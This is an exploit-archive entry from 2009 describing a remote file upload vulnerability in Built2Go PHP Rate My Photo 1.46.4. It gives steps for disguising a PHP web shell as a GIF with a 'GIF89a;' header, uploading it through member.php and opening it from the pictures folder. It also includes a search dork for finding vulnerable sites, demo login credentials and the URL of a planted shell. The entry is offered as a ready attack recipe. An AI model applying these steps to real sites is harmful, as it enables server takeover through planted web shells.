[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Built2Go PHP Rate My Photo 1.46.4 Remote File Upload Vulnerability
# Published : 2009-01-02
# Author : ZoRLu
# Previous Title : Built2Go PHP Link Portal 1.95.1 Remote File Upload Vulnerability
# Next Title : phpSkelSite 1.4 (RFI/LFI/XSS) Multiple Remote Vulnerabilities
[~] Built2Go PHP Rate My Photo v1.46.4 RFU
[~]
[~]----------------------------------------------------------
[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com
[~]
[~] Date: 22.11.2008
[~]
[~] Home: z0rlu.blogspot.com / www.experl.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] dork mu :) "My Photo v1.46.4 ?? Big Resources" ( for yahoo )
[~]
[~] onemli N0TT: arkadaslar hepimiz biliyoruz ki arama motoru yalnIzca google deil
[~]
[~] bide yahoo yu deneyin sonra hi?§ site yok dersiniz xD
[~]
[~] EN ONEMLi N0T: demolarI hackleyen top olsun top ( if you hack demo you will be ball xD )
[~] -----------------------------------------------------------
first register to site
you add this code your shell to head
GIF89a;
example your_shell.php:
GIF89a;
<?
...
...
...
?>
and save your_sheell.php
after go member.php
select your shell.php and your shell here:
http://z0rlu.blogspot.com/script/pictures/[id]shell.php
exp:
demo:
http://demos.built2go.com/rate%20my%20photo/1/
login:
http://demos.built2go.com/rate%20my%20photo/1/member.php
user: salla
pass: salla1
shell:
http://demos.built2go.com/rate%20my%20photo/1/pictures/418_2009-01-0204-11-57.php
[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & Scriptorium & h4ckinger & Cyber_Thief & BLaSTeR & Ahmet and all experl.com users :)
[~]
[~] yildirimordulari.org & experl.com
[~]
[~]----------------------------------------------------------------------
# www.Syue.com [2009-01-02]